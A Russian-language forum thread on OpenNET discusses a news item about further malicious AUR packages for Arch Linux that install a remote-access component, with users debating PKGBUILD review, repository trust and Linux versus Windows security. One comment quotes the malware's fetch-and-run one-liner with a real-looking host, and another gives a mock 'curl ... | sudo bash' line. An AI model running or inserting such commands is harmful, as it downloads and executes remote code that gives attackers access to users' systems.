The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы
правила/FAQ
поиск
регистрация
вход/выход
слежка
RSS


"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных пакета"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных пакета"  +/
Сообщение от opennews (??), 01-Авг-25, 22:35 
В репозитории AUR (Arch User Repository), применяемом в Arch Linux для распространения пакетов от сторонних разработчиков, продолжилась публикация вредоносного кода, интегрированного в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад вредоносным пакетам  firefox-patch-bin, librewolf-fix-bin и zen-browser-patched-bin, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе...

Подробнее: https://www.opennet.me/opennews/art.shtml?num=63662

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по времени | RSS]


1. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  +4 +/
Сообщение от Аноним (1), 01-Авг-25, 22:35 
> python -c "$(curl https://segs.lol/9wUb1Z)"

LOL!

Ответить | Правка | Наверх | Cообщить модератору

2. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  +14 +/
Сообщение от Аноним (2), 01-Авг-25, 22:36 
В AUR-репозитории выявлен безвредный пакет.
Ответить | Правка | Наверх | Cообщить модератору

3. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Анонимemail (3), 01-Авг-25, 22:49 
Вредоносных программ под Linux всё больше и больше. Но правда они чаще всего атакуют пользователей работают из-под рута.
Ответить | Правка | Наверх | Cообщить модератору

5. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +2 +/
Сообщение от Аноним (5), 01-Авг-25, 22:52 
виноват в первую очередь сам пользователь

Главное написать Не ставить ЭТОТ пакет.. и пользователь поставит.

Ведь всю помойку тянут на ПК.. всю!

Ответить | Правка | Наверх | Cообщить модератору

48. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Anonimm (?), 02-Авг-25, 08:08 
Гениально! В винде вирусы и трояны устанавливаются из-под админа - "дырявая система", то же самое в лине - "но правда для запуска требуется рут"..
Ответить | Правка | К родителю #3 | Наверх | Cообщить модератору

88. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +2 +/
Сообщение от Аноним (88), 02-Авг-25, 12:04 
Надо ставить DrWeb
Ответить | Правка | Наверх | Cообщить модератору

100. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Anonimm (?), 02-Авг-25, 12:50 
Я о двойных стандартах. То, что винду считают дырявой, но если линь делает ровно то же, то это норма..
Ответить | Правка | Наверх | Cообщить модератору

130. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Аноним (-), 02-Авг-25, 16:18 
Ты передёргиваешь. Линукс безопасен. Описанное в новости поведение вредителя на Windows OS делается вполне легально. Винда вполне легально делает скриншот твоего рабочего стола и отправляет его на свои сервера. И никто по этому поводу не возникает, потому что вредительство прописано в лицензионном договоре.
Ответить | Правка | Наверх | Cообщить модератору

145. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от кантикариус (?), 02-Авг-25, 20:26 
Не делает, если ты не захочешь. А если делает, то никуда не отправляет. У вас просто очень большие глаза. Это из-за плохих дешёвых экранов и трудночитаемых шрифтов.
Ответить | Правка | Наверх | Cообщить модератору

106. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (106), 02-Авг-25, 12:59 
Это - другое! ))
Ответить | Правка | К родителю #48 | Наверх | Cообщить модератору

4. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  –1 +/
Сообщение от Аноним (5), 01-Авг-25, 22:49 
Так можно туннели бекдором до SSH кидать и компом чужим управлять..

Ответить | Правка | Наверх | Cообщить модератору

75. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  –1 +/
Сообщение от Аноним (75), 02-Авг-25, 10:31 
На домашнем (и служебном) компьютере SSH делать нечего. Хотя во всех Ubuntu и его форках ставится по умолчанию. Мое личное мнение (не навязываю), что SSH - это для удаленного управления сервером.
Ответить | Правка | Наверх | Cообщить модератору

101. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  +/
Сообщение от Anonimm (?), 02-Авг-25, 12:52 
А как ты собрался связываться с сервером, если на устройстве, с которого ты хочешь подключиться к серверу, ssh нет?
Да уж, уровень экспертности зашкаливает.. 😆
Ответить | Правка | Наверх | Cообщить модератору

107. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  +/
Сообщение от olelukoie (ok), 02-Авг-25, 13:20 
М-да? А если еще раз подумать? В нормальных дистрибутивах (open)ssh-client(s) и (open)ssh-server - это разные пакеты и если надо подключаться к удаленному хосту по ssh, а свой сервер поднимать не требуется, то ставится только пакет 'client'.

> На домашнем (и служебном) компьютере SSH делать нечего. Хотя во всех Ubuntu и его форках ставится по умолчанию. Мое личное мнение (не навязываю), что SSH - это для удаленного управления сервером.

Если есть статический IP, то ssh - удобный способ подключения к собственному домашнему компу издалека (с дачи, из командировки, с курорта и т.п.; разумеется, дома должен быть кто-то, кто этот комп включит и затем выключит). Так что наличие ssh на домашнем компе не такая уж ненужная вещь. А про рабочий комп в "офисе", если он переведен на "отечественную" ОС или любой другой Linux, то ssh - один из очень немногих способов админам управлять рабочими местами сотрудников, так что ssh-сервер тоже весьма вероятно будет нужен.

Ответить | Правка | Наверх | Cообщить модератору

118. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  +/
Сообщение от Аноним (75), 02-Авг-25, 14:49 
> ssh - удобный способ подключения к собственному домашнему компу издалека (с дачи, из командировки, с курорта и т.п.; разумеется, дома должен быть кто-то, кто этот комп включит и затем выключит)

Против такого трудно что-то возразить. Ставьте, заходите. Только я бы при острой нужде подключился по RDP.

Ответить | Правка | Наверх | Cообщить модератору

116. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  +/
Сообщение от Аноним (75), 02-Авг-25, 14:48 
> А как ты собрался связываться с сервером, если на устройстве, с которого ты хочешь подключиться к серверу, ssh нет?

Не могу представить себе бухгалтера, который в минутку для отдыха от работы в 1С решил зайти по SSH на сервер. В нормальном учреждении пользователи работают с определенным набором приложений. Всё. Об админах не говорим - там другое дело. Да, и админу нечего делать на компьютере пользователя через SSH.

Ответить | Правка | К родителю #101 | Наверх | Cообщить модератору

6. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от Аноним (6), 01-Авг-25, 22:58 
И что теперь делать?
Ответить | Правка | Наверх | Cообщить модератору

7. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +14 +/
Сообщение от Аноним (7), 01-Авг-25, 23:10 
Читать пкгбилды аура перед запуском.

Правда в мире, где половина инновационного софта ставится через curl |sudo sh , будет затруднительно отличить вирус от нормального софта.

Ответить | Правка | Наверх | Cообщить модератору

49. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –3 +/
Сообщение от Anonimm (?), 02-Авг-25, 08:11 
> Читать пкгбилды

Нормальные системы ставятся через "Далее" и только в лине для установки программ нужно быть ещё и программистом..

Ответить | Правка | Наверх | Cообщить модератору

64. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +2 +/
Сообщение от Аноним (64), 02-Авг-25, 09:25 
Для быта Линукс даже не мёртв, а не зачат.
Ответить | Правка | Наверх | Cообщить модератору

78. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (75), 02-Авг-25, 10:40 
Разработанные мной программы под Linux ставятся, как Вы выразились, через "Далее" с помощью InstallJammer.
Ответить | Правка | К родителю #49 | Наверх | Cообщить модератору

147. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от кантикариус (?), 02-Авг-25, 20:30 
Что за программы? Хочу поставить. Хотелось бы получить полный список со ссылками.
Ответить | Правка | Наверх | Cообщить модератору

89. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от Пояснительная бригада (?), 02-Авг-25, 12:04 
Так Арч не для домохозяек, а для опытных Линукс пользователей, с разморозкой.
Ответить | Правка | К родителю #49 | Наверх | Cообщить модератору

102. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Anonimm (?), 02-Авг-25, 12:53 
А вот и разделение на сорта подъехало..
Ответить | Правка | Наверх | Cообщить модератору

114. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Пояснительная бригада (?), 02-Авг-25, 14:41 
Так зайди на офф сайт арча и почитай об этом! Писать все горазды.
Ответить | Правка | Наверх | Cообщить модератору

148. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от кантикариус (?), 02-Авг-25, 20:37 
Я домохозяин. Несколько лет на Арче сидел. Ничем принципиально не отличается от Убунты, кроме того, что всё-таки нужно почитать мануалы и больше печатать в терминале. Да и то, это больше касается процесса установки, чем последующего повседневного использования. А так, что тот линукс, что этот на десктопе как на корове седло.
Ответить | Правка | К родителю #89 | Наверх | Cообщить модератору

90. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Аноним (88), 02-Авг-25, 12:06 
Установить антивирус.
Во всех нормальных магазинах приложений для Андроид есть встроенный.
Ответить | Правка | К родителю #49 | Наверх | Cообщить модератору

103. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Anonimm (?), 02-Авг-25, 12:54 
Какая взаимосвязь между pkgbuild и Android?
Ответить | Правка | Наверх | Cообщить модератору

149. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от кантикариус (?), 02-Авг-25, 20:39 
Прямая. Андроид - это линукс? Или нет?
Ответить | Правка | Наверх | Cообщить модератору

168. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (88), 02-Авг-25, 23:13 
Прямая, магазин приложений обращается в репозиторий приложений (пакетов в любом формате), в котором осуществляется эвристический анализ.
Ответить | Правка | К родителю #103 | Наверх | Cообщить модератору

16. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от НяшМяш (ok), 02-Авг-25, 00:12 
Клонить репы себе на машину, удалять .git, проверять PKGBUILD и самому поддерживать. Иногда даже получается проще, потому что меинтейнеры оригинальных пакетов часто слоупочат версии обновлять.
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

150. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от кантикариус (?), 02-Авг-25, 20:44 
Здесь есть чел у которого 493 правила для браузера в Никс Ось. Да ну обычный линукс-десктоп обычного линукс-пользователя.

>на машину

Как же мне нравится, когда вы называете свои коре 2 дуо и пентиумы МАШИНАМИ! :DD Респект!

Ответить | Правка | Наверх | Cообщить модератору

26. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (26), 02-Авг-25, 02:33 
В дополнение к вышеупомянутому ОБЯЗАТЕЛЬНОМУ чтению PKGBUILD'ов. Наверное не ставить пакеты с идиотскими названиями, от васяна с нулевым аккаунтом. А также заглядывать в комментарии AUR странички, главное, чтобы они тоже не были идиотскими, от васяна с нулевым аккаунтом.
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

151. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от кантикариус (?), 02-Авг-25, 20:48 
Сейчас ставить из AUR - это примерно как я зайду на дзен или на маил.сру и начну оттуда по ссылкам ставить софт на винду :D
Ответить | Правка | Наверх | Cообщить модератору

28. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Bottle (?), 02-Авг-25, 02:50 
Читать исходники? Поборники свободы сами что-то не желают ей пользоваться на постоянке - они хотят, чтобы за них работали БЕСПЛАТНО.
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

50. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Anonimm (?), 02-Авг-25, 08:12 
Интересно, а для андроида и айфона они тоже исходники читают?
Вспомнил - ведь "это другое".. 😆
Ответить | Правка | Наверх | Cообщить модератору

59. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от dannyD (?), 02-Авг-25, 08:58 
сходи на f-droid почитай.
Ответить | Правка | Наверх | Cообщить модератору

91. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Пояснительная бригада (?), 02-Авг-25, 12:06 
Потому-то здесь троллей и навалом, ибо не понимают разницы между виндой и дистрибутивами Линукс.
Ответить | Правка | К родителю #28 | Наверх | Cообщить модератору

104. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Anonimm (?), 02-Авг-25, 12:56 
> не понимают разницы между виндой и дистрибутивами Линукс.

Как выяснилось - никакой..

Ответить | Правка | Наверх | Cообщить модератору

152. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от кантикариус (?), 02-Авг-25, 20:51 
Ну нифига себе поклёп. На винде можно отдыхать и работать. А под жигулями только лежать.
Ответить | Правка | Наверх | Cообщить модератору

10. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –5 +/
Сообщение от freeperson (?), 01-Авг-25, 23:30 
Arch стал уже стал попсой, как винда, что его таргетят кулхацкеры ежедневно. AUR это та ещё помойка, где никто не проверяет ничего. Чувакам "I use arch btw": ставьте Слаку или Gentoo, и будет вам счастье.
Ответить | Правка | Наверх | Cообщить модератору

14. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (14), 02-Авг-25, 00:04 
Гентушникам тоже ухо держать востро в отношении к оверлеям.
Ответить | Правка | Наверх | Cообщить модератору

32. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от 12yoexpert (ok), 02-Авг-25, 05:29 
разумеется, но:
1) гентушников тупо меньше и оверлеи им нужны гораздо реже, чем AUR на арче, и для настолько специфичного софта, что пропихивать туда малварь тупо не окупится
2) это гента со всеми вытекающими, поди заставь свою попсовую малварь там работать: у кого-то musl, у кого-то openrc, у кого-то, прости господи, шланг, даже версии питона у всех разные
Ответить | Правка | Наверх | Cообщить модератору

58. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от dannyD (?), 02-Авг-25, 08:53 
>>гентушников тупо меньше

это с какого пальца?

может чем бубунтят и меньше,но с рачеводами я бы еще сильно поспорил.

Ответить | Правка | Наверх | Cообщить модератору

72. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от 12yoexpert (ok), 02-Авг-25, 10:25 
да тупо судя по количеству попсовых пакетов. поди попробуй собери хоть один слайсер на генту, хоть оверлеями, хоть без

мне пришлось вырезать половину месы, чтобы кура запустилась

Ответить | Правка | Наверх | Cообщить модератору

85. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от dannyD (?), 02-Авг-25, 11:54 
>>да тупо судя по количеству попсовых пакетов.

ошибка статистической выборки.

ну не надо гентушникам это, я вот даже не знаю о чем вы, коллега.

Ответить | Правка | Наверх | Cообщить модератору

140. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (140), 02-Авг-25, 19:52 
куры нет в репе 24.04 LTS - я немного охренел от такого (в дебиане то все есть), пришлось собрать из более младшенького - работает... но вот от того куда скатился "самый человечный десктоп дистр" я немного удивился...
Ответить | Правка | К родителю #72 | Наверх | Cообщить модератору

24. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Аноним (26), 02-Авг-25, 02:16 
> AUR это та ещё помойка, где никто не проверяет ничего.
> Вредоносный пакет был удалён администраторами AUR через несколько часов после появления.

Держи в курсе.

> ставьте Слаку или Gentoo, и будет вам счастье.

Не ставьте свое "ненужно", ставьте мое "ненужно"!!!1!1

Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору

33. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от 12yoexpert (ok), 02-Авг-25, 05:33 
поддерживаю как гентушник, лет 7 сидевший на арче
Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору

141. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (141), 02-Авг-25, 19:52 
> Чувакам "I use arch btw": ставьте Слаку или Gentoo, и будет вам счастье.

Я выбирал между Слакой и Арчем. От Слаки отказался только из-за отсутствия отслеживания зависимостей пакетов.
Думал про Генту или ЛФС, но там читать слишком много, я хоть и безработный на сегодняшний день, но времени на это не хватает.

Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору

153. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от кантикариус (?), 02-Авг-25, 20:53 
Нужно сразу ставить LFS.
Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору

20. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Аноним (20), 02-Авг-25, 01:02 
AUR удобно использовать как источник готовых инструкций для сборки пакетов которых нет в BLFS.
Ответить | Правка | Наверх | Cообщить модератору

38. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +2 +/
Сообщение от Аноним (38), 02-Авг-25, 06:07 
Чем это отличается от npm?
Ответить | Правка | Наверх | Cообщить модератору

41. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Анониматор (?), 02-Авг-25, 07:10 
Это всё Манждаро виноват. Понаставят pamac-aur и всё, считают что AUR это часть Арча, прозрачная установка "из магазина".
Хотя уже много где в сети написано что они дурачье и не надо делать так. Но если кому-то нравится рисковать - это конечно ваше дело, но не надо свои проблемы триангулировать на всех
Ответить | Правка | Наверх | Cообщить модератору

46. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –4 +/
Сообщение от ЖИРОПЕРДЯСТИК (?), 02-Авг-25, 07:55 
> считают что AUR это часть Арча

Так убери у Арча AUR и он превратится в маргинальный дистрибутив, которым пользуются три калеки.

А если AUR использовать, то это ЗверьCD скачай бесплатно без SMS.

Ответить | Правка | Наверх | Cообщить модератору

47. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (47), 02-Авг-25, 08:05 
ты назвал маргинальщиной такие дистрибутивы как RHEL с клонами и многими другими. Они тоже без епеля (ppa и т.д.) ничто. AUR скорее всего уйдет в тень, потому что тенденция всё недостающее ставить из флатхаба, а это по наполнению тоже как говорится "найди 3 отличия от AUR", так что Арч и тут не выделяется среди других "маргинальностью"
Ответить | Правка | Наверх | Cообщить модератору

154. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от кантикариус (?), 02-Авг-25, 20:58 
> Так убери у Арча AUR и он превратится в маргинальный дистрибутив

Ерню полную сморозил. Гейб смотрит на тебя с жалостью.

Ответить | Правка | К родителю #46 | Наверх | Cообщить модератору

42. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –2 +/
Сообщение от ЖИРОПЕРДЯСТИК (?), 02-Авг-25, 07:10 
Да изначально было понятно, что AUR - это помойка. Любой Васян туда может прийти и понапихать бэкдоров в пакеты.
Ответить | Правка | Наверх | Cообщить модератору

52. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +2 +/
Сообщение от Аноним (47), 02-Авг-25, 08:16 
Таких васянов там сразу отлавливают, этот и полдня не продержался. Отличная работа
Ответить | Правка | Наверх | Cообщить модератору

77. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (77), 02-Авг-25, 10:38 
Не совсем. Поскольку у них нет премодерации пакетов от не пойми кого.
Ответить | Правка | Наверх | Cообщить модератору

82. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от ЖИРОПЕРДЯСТИК (?), 02-Авг-25, 10:53 
> Таких васянов там сразу отлавливают

Главное верить. Тысячегласс смотрят!

Ответить | Правка | К родителю #52 | Наверх | Cообщить модератору

99. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Аноним (99), 02-Авг-25, 12:38 
> Тысячегласс смотрят!

https://skillbox.ru/upload/setka_images/11561419052025_44197...

Ответить | Правка | Наверх | Cообщить модератору

94. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Пояснительная бригада (?), 02-Авг-25, 12:14 
Not a bug, а фича. Нормальный aur helper перед установкой любого пакета оттуда сначала показывает pkgbuild файл, а дальше всё зависит от прослойки между монитором и креслом.
Ответить | Правка | К родителю #42 | Наверх | Cообщить модератору

135. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (38), 02-Авг-25, 18:35 
Посмотри как в xz бэкдор всунули и подумай, поможет ли тебе чтение pkgbuild файлов.
Ответить | Правка | Наверх | Cообщить модератору

45. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (45), 02-Авг-25, 07:44 
А что ваш там pip или npm прям безопасны да? Или PPA Ubuntu?
Берешь себе за правило - изучать каждый PKGBUILD и всё, проблема решена!
Собственно, по мимо администраторов, юзеры тоже могут проверять PGBUILDы и указывать на нарушения. Ну и не хрен ставить все подряд, не думая и не проверяя, такой подход угробит любую ОСь, хоть даже винду, мак или андроид.
Ответить | Правка | Наверх | Cообщить модератору

53. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от Anonimm (?), 02-Авг-25, 08:18 
> изучать каждый PKGBUILD

А потом удивляться, что вас всего 4%..

Ответить | Правка | Наверх | Cообщить модератору

81. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от Аноним (75), 02-Авг-25, 10:51 
> вас всего 4%

Нас даже официально 5%. Не считая суверенных установок, которые используются во всем мире, а не только в РФ, "как думают некоторые студенты", и вряд ли попадают в данную статистику.

Ответить | Правка | Наверх | Cообщить модератору

156. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от кантикариус (?), 02-Авг-25, 21:02 
Где вас 5%? Всё изворачиваетесь. Идите ещё снова Андроид посчитайте. Как было ~1,5%, так и есть.
Ответить | Правка | Наверх | Cообщить модератору

121. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Пояснительная бригада (?), 02-Авг-25, 15:01 
Тебе надо 146%?
Ответить | Правка | К родителю #53 | Наверх | Cообщить модератору

63. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (63), 02-Авг-25, 09:13 
А ведь в убунтовском launchpad ppa не меньше, или даже больше малвари от ноунэйм авторов. А в aur то не бинари, а pkgbuild, что как бы позволяет увидеть подмену.
Ответить | Правка | Наверх | Cообщить модератору

87. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Аноним (87), 02-Авг-25, 11:58 
> А в aur то не бинари

Говоришь так, будто бы их там нет...

Ответить | Правка | Наверх | Cообщить модератору

119. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (26), 02-Авг-25, 14:52 
Для тугодумов разжую. PKGBUILD это простой bash скрипт, даже если пакет собирается из бинарников, в этом скрипте находятся ссылки на источники с которых эти бинарники качаются. Никто не мешает заглянуть в PKGBUILD (хоть через вебморду) и убедится что файлы качаются с официального сайта/репозитория.
Ответить | Правка | Наверх | Cообщить модератору

158. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от кантикариус (?), 02-Авг-25, 21:05 
убедится что файлы качаются с официального скомпрометированного гитхаба.
Ответить | Правка | Наверх | Cообщить модератору

167. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (167), 02-Авг-25, 22:54 
Какой конченый дебилизм я прочитал.

PKGBUILD

curl -s https://totally.safe/not.malware.sh | sudo bash -c

Безопасность!

Ответить | Правка | К родителю #119 | Наверх | Cообщить модератору

67. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –2 +/
Сообщение от Аноним (67), 02-Авг-25, 09:37 
Достаточно не ставить свежие пакеты из аур.
Ответить | Правка | Наверх | Cообщить модератору

73. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от 12yoexpert (ok), 02-Авг-25, 10:26 
это арч, там в принципе нет несвежих пакетов
Ответить | Правка | Наверх | Cообщить модератору

159. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от кантикариус (?), 02-Авг-25, 21:07 
И начать ставить несвежие. Из AUR :D
Ответить | Правка | К родителю #67 | Наверх | Cообщить модератору

166. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (167), 02-Авг-25, 22:52 
Лол, что, это реальная защита такая?

Линус фанаты продолжают нести и не расплескивать.

Никто ни за что не отвечает, тысячи пакетов, непонятные мейнтейнеры, про которых известен только их выдуманный email, никакой репутации или юридической ответственности - БЕЗОПАСНОСТЬ.

Про xz, который был затроянен месяцами и попал в несколько листов, забыли.

ЛОЛ.

Ответить | Правка | К родителю #67 | Наверх | Cообщить модератору

86. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Аноним (86), 02-Авг-25, 11:57 
Это проблема куда шире чем кажется. Разработчик вылежат своё ПО только под Win и Mac, он не будит собирать под 100500 диструбтивов Linux на 4% рынка дисктопов!
А пользователь хочет именно пользоваться ОС, то есть устанавливать ПО в пару кликов через GUI.
Вот здесь у тех, у кого красные глаза и бубен в руках решают монетанизировать свой мазахизм чёрными методами!
Ответить | Правка | Наверх | Cообщить модератору

95. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Пояснительная бригада (?), 02-Авг-25, 12:17 
Просто ввёл название пакета в терминал и установил его, даже не кликая мышью. чяднт? Или искать в интернетах удобнее?
Ответить | Правка | Наверх | Cообщить модератору

142. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (140), 02-Авг-25, 19:55 
виндузятнику же удобнее "бесплатно и без смс" - он по другому и не умеет...
Ответить | Правка | Наверх | Cообщить модератору

165. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (86), 02-Авг-25, 21:52 
Вы это написали к чему? Намекаете что и так всё в порядке? Про процент дисктопа уже было написано.

> "Просто ввёл название пакета в терминал и установил его, даже не кликая мышью. чяднт?"

У людей ОС установлена не для развлечений, у них вообще-то платёжный терминал для торговли на бирже установлен. А вы предлагаете довериться какому-то непонятному Васи.
Сторонники теории 1000 глаз? Только она не даёт гарантии. Сколько было случаев, когда пакет выкупали и внедряли блэкдор.

> "Или искать в интернетах удобнее?"

Безопаснее ставить ПО напрямую от создателя. Под "в пару кликов через GUI." имеется виду, что для этого консоль открывать не нужно.


Снизу коммент, тоже относится и к ppa. Это вам не AppStore, где есть пре-модерация.
> "От AUR отказала два года назад, когда скачал бинарник и решил проверить на вирустотал - бэкдор."

Казалось бы, причём здесь LTS, только там софт (вмести с багами, которые знают абсолютно все) устаревший - старше чем помёт мамонта. Valve из-за этого фактора на Arch перешла.

Ответить | Правка | К родителю #95 | Наверх | Cообщить модератору

93. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (93), 02-Авг-25, 12:13 
От AUR отказала два года назад, когда скачал бинарник и решил проверить на вирустотал - бэкдор.
Ответить | Правка | Наверх | Cообщить модератору

96. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Пояснительная бригада (?), 02-Авг-25, 12:23 
Aур использую чтоб качать 1 пакет, zapret.
Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей 		Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру